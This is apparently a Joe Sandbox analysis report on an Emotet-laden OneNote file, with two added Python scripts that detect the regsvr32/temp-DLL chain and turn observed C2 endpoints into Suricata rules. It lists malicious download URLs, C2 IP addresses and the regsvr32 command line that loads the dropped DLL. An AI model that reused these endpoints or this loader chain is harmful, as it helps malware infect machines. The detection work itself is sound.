                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E17D3C push ebp; retf 3_2_00E17D3D
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E17EAF push 458BCC5Ah; retf 3_2_00E17EBC
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E09E8B push eax; retf 3_2_00E09E8E
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0A26E push ebp; ret 3_2_00E0A26F
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1C731 push esi; iretd 3_2_00E1C732
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E06CDE push esi; iretd 4_2_00E06CDF
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E06C9F pushad ; ret 4_2_00E06CAA
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E26D34 push edi; ret 4_2_00E26D36
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1C731 push esi; iretd 4_2_00E1C732
                Source: radC86B9.tmp.dll.1.drStatic PE information: section name: _RDATA
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll
                Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dllJump to dropped file
                Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\VZzVLyswcgycmo\hwmNzoGEns.dll (copy)Jump to dropped file
                Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\VZzVLyswcgycmo\hwmNzoGEns.dll (copy)Jump to dropped file
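The process chain recorded above (ONENOTE.EXE starts wscript.exe on click.wsf in %TEMP%; wscript.exe starts the 32-bit regsvr32.exe on radC86B9.tmp.dll in %TEMP%; that hands off to the 64-bit regsvr32.exe, which copies the DLL under C:\Windows\system32\VZzVLyswcgycmo\ and re-registers it) is what the "Sigma detected: Run temp file via regsvr32" signature keys on. The following Python is an added example, not part of the Joe Sandbox report and not a published Sigma rule: it encodes three checks of that kind and runs them over a constructed set of process-creation events whose command lines mirror the report's chain, plus two benign regsvr32 controls that must not alert. The event field names (pid, ppid, image, cmd), the rule names and the benign events are assumptions made for the example.

```python
import re

# Constructed process-creation events (a Sysmon-style parent/child view), not
# taken from any real log. The first five mirror the chain in the report above;
# the last two are benign controls (an installer registering a vendor DLL).
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE",
     "cmd": r'"C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\OMICS.one"'},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmd": r'C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"'},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmd": r'"C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll"'},
    {"pid": 103, "ppid": 102, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r'"C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll"'},
    {"pid": 104, "ppid": 103, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r'C:\Windows\system32\regsvr32.exe "C:\Windows\system32\VZzVLyswcgycmo\hwmNzoGEns.dll"'},
    {"pid": 200, "ppid": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r'msiexec.exe /i "C:\Users\user\Downloads\setup.msi"'},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
]

OFFICE_APPS = {"onenote.exe", "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def image_name(ev):
    """Lower-cased file name of the process image."""
    return ev["image"].rsplit("\\", 1)[-1].lower()


def ancestors(ev, by_pid):
    """Parent, grandparent, ... of ev as far as the event set allows (bounded)."""
    chain, cur = [], ev
    while cur["ppid"] in by_pid and len(chain) < 64:
        cur = by_pid[cur["ppid"]]
        chain.append(cur)
    return chain


def rule_regsvr32_temp_dll(ev, by_pid):
    """regsvr32 handed a path under the user's Temp directory (the Sigma idea)."""
    return image_name(ev) == "regsvr32.exe" and TEMP_DIR.search(ev["cmd"]) is not None


def rule_office_spawns_script_host(ev, by_pid):
    """An Office application (here ONENOTE.EXE) directly starting a script host."""
    parent = by_pid.get(ev["ppid"])
    return (image_name(ev) in SCRIPT_HOSTS and parent is not None
            and image_name(parent) in OFFICE_APPS)


def rule_regsvr32_under_office_script_chain(ev, by_pid):
    """regsvr32 anywhere below Office -> script host, however many regsvr32 hops
    (32-bit -> 64-bit -> copied DLL) sit in between; catches the final stage whose
    own command line no longer mentions %TEMP%."""
    if image_name(ev) != "regsvr32.exe":
        return False
    names = {image_name(a) for a in ancestors(ev, by_pid)}
    return bool(SCRIPT_HOSTS & names) and bool(OFFICE_APPS & names)


RULES = {
    "regsvr32_temp_dll": rule_regsvr32_temp_dll,
    "office_spawns_script_host": rule_office_spawns_script_host,
    "regsvr32_under_office_script_chain": rule_regsvr32_under_office_script_chain,
}


def evaluate(events):
    """Run every rule over every event; returns {(rule_name, pid), ...}."""
    by_pid = {ev["pid"]: ev for ev in events}
    return {(name, ev["pid"]) for ev in events for name, rule in RULES.items() if rule(ev, by_pid)}


if __name__ == "__main__":
    for name, pid in sorted(evaluate(EVENTS)):
        print(f"{name:36s} pid={pid}")
```

The third rule is the one that matters for the last stage: once the DLL has been copied under C:\Windows\system32\VZzVLyswcgycmo\, the regsvr32 command line looks like an ordinary system-directory registration, and only the ancestry (Office app above a script host) still betrays it.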

                Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\regsvr32.exe | File opened: C:\Windows\system32\VZzVLyswcgycmo\hwmNzoGEns.dll:Zone.Identifier | Access: read attributes | delete
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe TID: 5960 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 6088 | Thread sleep time: -270000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe | API coverage: 8.0 %
Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\regsvr32.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180008D28 FindFirstFileExW
Source: C:\Windows\System32\regsvr32.exe | File Volume queried: C:\ FullSizeInformation
Source: wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399676570.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400870952.0000000005251000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.388435082.0000000005238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.404609462.0000000005253000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW 5)
Source: wscript.exe, 00000001.00000003.400714303.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399676570.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402484207.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.388435082.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.404747809.0000000005290000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.504134282.0000000000F11000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632757041.0000000000F11000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.532494710.0000000000F11000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.480984272.0000000000F11000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: regsvr32.exe, 00000004.00000002.632757041.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.480385040.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@q
Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_000000018000A878 GetProcessHeap
Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory
Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00000001800082EC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00000001800017DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\regsvr32.exe | Network Connect: 164.90.222.65 443
Source: C:\Windows\SysWOW64\wscript.exe | Network Connect: 203.26.41.131 443
Source: C:\Windows\SysWOW64\wscript.exe | Domain query: penshorn.org
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 66.228.32.31 7080
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 187.63.160.88 80
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 104.168.155.143 8080
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 159.89.202.34 443
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 91.121.146.47 8080
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 160.16.142.56 8080
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 182.162.143.56 443
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 167.172.199.165 8080
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 163.44.196.120 8080
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe | Command line: "C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll"
Source: C:\Windows\System32\regsvr32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00000001800070A0 cpuid
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180001D98 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
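The Network Connect lines above are the endpoints the sandbox actually saw a process open (the wscript.exe connection to 203.26.41.131 is the penshorn.org stage-two download; the regsvr32.exe connections are the post-infection traffic, most of it on 7080 and 8080 rather than 80 or 443). The URL tables further down this page were instead recovered from process memory and contain damaged fragments: trailing junk such as "tM" or "Z=", a truncated "...ElKHvb4QIQqSrh6H", one host (912.162.143.56) that is not a syntactically valid IPv4 address, and hosts (169.89.202.34, 187.172.199.165) that never appear among the observed connections. The following Python is an added example, not part of the Joe Sandbox report: it parses the Network Connect evidence, cross-checks memory-recovered URLs against it so that only observed endpoints become indicators, lists the non-standard ports, and emits Suricata rules for the observed endpoints. The two input lists are constructed from the report's own lines; the rule message text, the flow keyword and the SID range are assumptions made for the example.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed input: the report's "Network Connect" lines, copied as text. The
# regex below only needs the "Network Connect: <ip> <port>" part, so the exact
# surrounding formatting does not matter.
NETWORK_CONNECT_LINES = [
    r"Source: C:\Windows\System32\regsvr32.exe | Network Connect: 164.90.222.65 443",
    r"Source: C:\Windows\SysWOW64\wscript.exe | Network Connect: 203.26.41.131 443",
    r"Source: C:\Windows\System32\regsvr32.exe | Network Connect: 66.228.32.31 7080",
    r"Source: C:\Windows\System32\regsvr32.exe | Network Connect: 187.63.160.88 80",
    r"Source: C:\Windows\System32\regsvr32.exe | Network Connect: 104.168.155.143 8080",
    r"Source: C:\Windows\System32\regsvr32.exe | Network Connect: 159.89.202.34 443",
    r"Source: C:\Windows\System32\regsvr32.exe | Network Connect: 91.121.146.47 8080",
    r"Source: C:\Windows\System32\regsvr32.exe | Network Connect: 160.16.142.56 8080",
    r"Source: C:\Windows\System32\regsvr32.exe | Network Connect: 182.162.143.56 443",
    r"Source: C:\Windows\System32\regsvr32.exe | Network Connect: 167.172.199.165 8080",
    r"Source: C:\Windows\System32\regsvr32.exe | Network Connect: 163.44.196.120 8080",
]

# Constructed subset of the URL strings the report recovered from process memory.
MEMORY_URLS = [
    "https://159.89.202.34:443/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/",
    "https://182.162.143.56/",
    "https://160.16.142.56:8080/u",
    "https://66.228.32.31:7080/Q",
    "https://169.89.202.34/",          # valid address, never connected to
    "https://187.172.199.165:8080/",   # valid address, never connected to
    "https://912.162.143.56/",         # first octet > 255: not an IPv4 address
    "https://penshorn.org/admin/Ses8712iGR8du/",
    "http://softwareulike.com/cWIYxWMPkK/",
]

CONNECT_RE = re.compile(r"Network Connect:\s*([\d.]+)\s+(\d+)")
STANDARD_PORTS = {80, 443}


def parse_network_connects(lines):
    """Set of (ip, port) pairs a process was actually observed connecting to."""
    out = set()
    for line in lines:
        m = CONNECT_RE.search(line)
        if m:
            out.add((m.group(1), int(m.group(2))))
    return out


def is_ipv4(host):
    """True only for a syntactically valid dotted-quad (912.x.x.x fails)."""
    try:
        ipaddress.IPv4Address(host)
        return True
    except ValueError:
        return False


def endpoint_from_url(url):
    """(host, port) with the scheme's default port filled in when absent."""
    parts = urlsplit(url)
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return parts.hostname, port


def classify(connect_lines, memory_urls):
    """Bucket memory-recovered URLs by how far the sandbox evidence supports them."""
    observed = parse_network_connects(connect_lines)
    result = {"confirmed": set(), "unconfirmed": set(), "invalid": set(), "domains": set()}
    for url in memory_urls:
        host, port = endpoint_from_url(url)
        if not re.fullmatch(r"[\d.]+", host):
            result["domains"].add(host)          # stage-two download hosts, not IP C2
        elif not is_ipv4(host):
            result["invalid"].add(host)          # garbled memory string
        elif (host, port) in observed:
            result["confirmed"].add((host, port))
        else:
            result["unconfirmed"].add((host, port))
    return result


def nonstandard_ports(endpoints):
    """Ports other than 80/443 among the given (ip, port) pairs."""
    return {port for _, port in endpoints if port not in STANDARD_PORTS}


def suricata_rules(endpoints, sid_base=9000000):
    """One Suricata rule per observed endpoint, SIDs assigned in address order."""
    ordered = sorted(endpoints, key=lambda e: (ipaddress.IPv4Address(e[0]), e[1]))
    return [
        f'alert tcp $HOME_NET any -> {ip} {port} '
        f'(msg:"Sandbox-observed outbound endpoint {ip}:{port}"; flow:to_server; '
        f'sid:{sid_base + i}; rev:1;)'
        for i, (ip, port) in enumerate(ordered)
    ]


if __name__ == "__main__":
    seen = parse_network_connects(NETWORK_CONNECT_LINES)
    print("non-standard ports:", sorted(nonstandard_ports(seen)))
    for bucket, items in classify(NETWORK_CONNECT_LINES, MEMORY_URLS).items():
        print(bucket, sorted(items))
    print("\n".join(suricata_rules(seen)))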

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: OMICS.one, type: SAMPLE
                Source: Yara matchFile source: 4.2.regsvr32.exe.bc0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.regsvr32.exe.bc0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.dd0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.dd0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.632533152.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.632618428.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.385011052.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: OMICS.one, type: SAMPLE
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts1
                Scripting
                1
                DLL Side-Loading
                111
                Process Injection
                21
                Masquerading
                OS Credential Dumping1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium11
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Exploitation for Client Execution
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Virtualization/Sandbox Evasion
                LSASS Memory121
                Security Software Discovery
                Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                Non-Standard Port
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)111
                Process Injection
                Security Account Manager1
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                Ingress Tool Transfer
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Scripting
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer3
                Non-Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Hidden Files and Directories
                LSA Secrets1
                Remote System Discovery
                SSHKeyloggingData Transfer Size Limits114
                Application Layer Protocol
                Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Obfuscated Files or Information
                Cached Domain Credentials2
                File and Directory Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                Regsvr32
                DCSync25
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 828486 Sample: OMICS.one Startdate: 17/03/2023 Architecture: WINDOWS Score: 100 33 129.232.188.93 xneeloZA South Africa 2->33 35 45.235.8.30 WIKINETTELECOMUNICACOESBR Brazil 2->35 37 36 other IPs or domains 2->37 47 Snort IDS alert for network traffic 2->47 49 Multi AV Scanner detection for domain / URL 2->49 51 Antivirus detection for URL or domain 2->51 53 7 other signatures 2->53 10 ONENOTE.EXE 21 23 2->10         started        signatures3 process4 process5 12 wscript.exe 2 10->12         started        dnsIp6 45 penshorn.org 203.26.41.131, 443, 49685 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 12->45 29 C:\Users\user\AppData\...\radC86B9.tmp.dll, PE32+ 12->29 dropped 31 C:\Users\user\AppData\Local\Temp\click.wsf, ASCII 12->31 dropped 59 System process connects to network (likely due to code injection or exploit) 12->59 17 regsvr32.exe 12->17         started        file7 signatures8 process9 process10 19 regsvr32.exe 2 17->19         started        file11 27 C:\Windows\System32\...\hwmNzoGEns.dll (copy), PE32+ 19->27 dropped 55 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->55 23 regsvr32.exe 19->23         started        signatures12 process13 dnsIp14 39 160.16.142.56, 8080 SAKURA-BSAKURAInternetIncJP Japan 23->39 41 91.121.146.47, 49686, 8080 OVHFR France 23->41 43 8 other IPs or domains 23->43 57 System process connects to network (likely due to code injection or exploit) 23->57 signatures15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                OMICS.one31%ReversingLabsScript-WScript.Trojan.OneNote
                OMICS.one41%VirustotalBrowse
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll58%ReversingLabsWin64.Trojan.Emotet
                C:\Windows\System32\VZzVLyswcgycmo\hwmNzoGEns.dll (copy)58%ReversingLabsWin64.Trojan.Emotet
                SourceDetectionScannerLabelLinkDownload
                3.2.regsvr32.exe.dd0000.0.unpack100%AviraHEUR/AGEN.1215476Download File
                4.2.regsvr32.exe.bc0000.0.unpack100%AviraHEUR/AGEN.1215476Download File
                SourceDetectionScannerLabelLink
                penshorn.org11%VirustotalBrowse
                SourceDetectionScannerLabelLink
                https://penshorn.org/v0%Avira URL Cloudsafe
                https://159.89.202.34:443/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                https://182.162.143.56/0%URL Reputationsafe
                http://softwareulike.com/cWIYxWMPkK/16%VirustotalBrowse
                https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                https://104.168.155.143:8080/l100%Avira URL Cloudmalware
                https://159.89.202.34/100%Avira URL Cloudmalware
                http://softwareulike.com/cWIYxWMPkK/100%Avira URL Cloudmalware
                https://164.90.222.65/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                https://160.16.142.56:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/;0%Avira URL Cloudsafe
                https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/11100%Avira URL Cloudmalware
                https://169.89.202.34/0%Avira URL Cloudsafe
                https://163.44.196.120:8080/100%Avira URL Cloudmalware
                https://66.228.32.31:7080/Q100%Avira URL Cloudmalware
                https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/100%Avira URL Cloudmalware
                https://91.121.146.47:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                https://187.172.199.165:8080/0%Avira URL Cloudsafe
                https://www.gomespontes.com.br/logs/pd/vM100%Avira URL Cloudmalware
                https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/Z=100%Avira URL Cloudmalware
                https://91.121.146.47:8080/100%Avira URL Cloudmalware
                https://www.gomespontes.com.br/logs/pd/0100%Avira URL Cloudmalware
                https://160.16.142.56:8080/u0%Avira URL Cloudsafe
                https://167.172.199.165:8080/100%Avira URL Cloudmalware
                https://159.89.202.34/q100%Avira URL Cloudmalware
                http://ozmeydan.com/cekici/9/100%Avira URL Cloudmalware
                https://penshorn.org/0%Avira URL Cloudsafe
                https://penshorn.org/admin/Ses8712iGR8du/tM100%Avira URL Cloudmalware
                https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM100%Avira URL Cloudmalware
                https://160.16.142.56:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/0%Avira URL Cloudsafe
                https://66.228.32.31:7080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/X&100%Avira URL Cloudmalware
                https://www.gomespontes.com.br/logs/pd/100%Avira URL Cloudmalware
                http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0100%Avira URL Cloudmalware
                https://penshorn.org/admin/Ses8712iGR8du/100%Avira URL Cloudmalware
                https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM100%Avira URL Cloudmalware
                https://104.168.155.143:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                https://164.90.222.65:443/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/?100%Avira URL Cloudmalware
                https://187.63.160.88:80/100%Avira URL Cloudmalware
                http://softwareulike.com/cWIYxWMPkK/yM100%Avira URL Cloudmalware
                http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/100%Avira URL Cloudmalware
                https://163.44.196.120:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                https://penshorn.org/admin/Ses8712iGR8du/R100%Avira URL Cloudmalware
                https://912.162.143.56/0%Avira URL Cloudsafe
                https://penshorn.org/admin/Ses8712iGR8du/cw3100%Avira URL Cloudmalware
                https://104.168.155.143:8080/(SI100%Avira URL Cloudmalware
                https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6H100%Avira URL Cloudmalware
                http://ozmeydan.com/cekici/9/xM100%Avira URL Cloudmalware
                https://167.172.199.165:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                https://91.121.146.47:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/0100%Avira URL Cloudmalware
                https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/100%Avira URL Cloudmalware
                https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllB100%Avira URL Cloudmalware
                https://160.16.142.56:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/b0%Avira URL Cloudsafe
                http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM100%Avira URL Cloudmalware
                https://159.89.202.34/wn100%Avira URL Cloudmalware
                https://penshorn.org:443/admin/Ses8712iGR8du/100%Avira URL Cloudmalware
                https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/D=100%Avira URL Cloudmalware
                https://160.16.142.56:8080/0%Avira URL Cloudsafe
                https://164.90.222.65/0100%Avira URL Cloudmalware
                https://187.63.160.88:80/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                penshorn.org
                203.26.41.131
                truetrueunknown
                NameMaliciousAntivirus DetectionReputation
                https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/true
                • Avira URL Cloud: malware
                unknown
                https://penshorn.org/admin/Ses8712iGR8du/true
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://159.89.202.34:443/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/regsvr32.exe, 00000004.00000002.633026699.000000000307F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                https://penshorn.org/vwscript.exe, 00000001.00000003.400442984.0000000005266000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.388435082.0000000005266000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402255447.0000000005266000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.404632194.0000000005266000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399676570.0000000005266000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
